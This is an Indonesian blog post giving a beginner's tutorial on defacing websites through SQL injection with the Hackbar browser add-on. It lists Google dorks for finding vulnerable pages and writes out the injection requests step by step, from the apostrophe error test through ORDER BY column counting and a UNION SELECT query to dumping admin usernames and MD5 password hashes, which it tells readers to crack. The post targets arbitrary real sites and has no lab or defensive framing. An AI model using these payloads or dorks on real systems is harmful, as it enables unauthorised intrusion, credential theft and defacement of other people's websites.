Home  ›  Tutorial Deface SQLI with Hackbar

Tutorial Deface SQLI with Hackbar

12/05/2017 Add Comment Edit
Ok gans, kali ini w post Tutorial Deface SQLI with Hackbar ok oc? yang manual mah w ga bisa, jadi kapan kapan aja :'v oke lanjut

BAHAN :
- Hackbar
- Dork : inurl:list.php?id=
              inurl:listing.php?id=
- Udud
- Waifu yang menemani :)

STEP BY STEP :
1. install HACKBAR nya, hanya bisa di mozilla firefox

2. setelah install, dorking dulu di google ya

3. setelah menemukan target, kasih tanda ' di belakang angka target
    Example : www.target.com/list.php?id=69'
    NB : kalau ada perubahan pada web tersebut / error, berarti vuln SQL-i

4. Setelah itu cari column target,
    EXAMPLE =
    www.target.com/list.php?id=69 order by 1--  = > NO ERROR
    www.target.com/list.php?id=69 order by 2--  = > NO ERROR
    www.target.com/list.php?id=69 order by 3--  = > NO ERROR
    www.target.com/list.php?id=69 order by 4--  = > NO ERROR
    www.target.com/list.php?id=69 order by 5--  = > NO ERROR
    www.target.com/list.php?id=69 order by 6--  = > NO ERROR
    www.target.com/list.php?id=69 order by 7--  = > NO ERROR
    www.target.com/list.php?id=69 order by 8--  = > NO ERROR
    www.target.com/list.php?id=69 order by 9--  = > NO ERROR
    www.target.com/list.php?id=69 order by 10--  = > NO ERROR
    www.target.com/list.php?id=69 order by 11--  = >  ERROR
    BERARTI ITU COLUMN NYA ADA 10


5. Setelah mengetahui columnya, cari angka ajaib yang ada pada website tersebut
    Example : www.target.com/list.php?id=-69 union select 1,2,3,4,5,6,7,8,9,10--
    NB : Jangan lupa mengasih tanda " - " di belakang angka nya ya
    Oke dapat angka ajaibnya, yaitu angka 2 :'D

6. Hapus angka 2 nya, setelah itu klik UNION BASED > DIOS MySQL > Dios by Zen

 7. Setelah itu, cari table user adminnya, tekan CTRL + F, trus cari USER

8. Setelah ketemu table user adminnya, klik UNION BASED > DATA > DATA ONE SHOT

 9. Nanti disuruh isi column 3x
    1. DATABASE()
    2. user [ di samakan dengan table web target kamu ]
    3. uName,0x7c,uPass [ disamakan juga dengan column web target kamu ]




10, Setelah itu klik OK... dan muncullah USERNAME dan PASSWORD admin target :'D

Itu password nya masih dalam hash type MD5, jadi kalian decrypt ya :'D
Kalau gak ngerti silahkan tinggalkan komentarnya, kalau ada kesalahan mohon maaf, saya blogger pemula, jadi wajarkan aja :'v
Sekian Terimakasih

0 Response to "Tutorial Deface SQLI with Hackbar"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel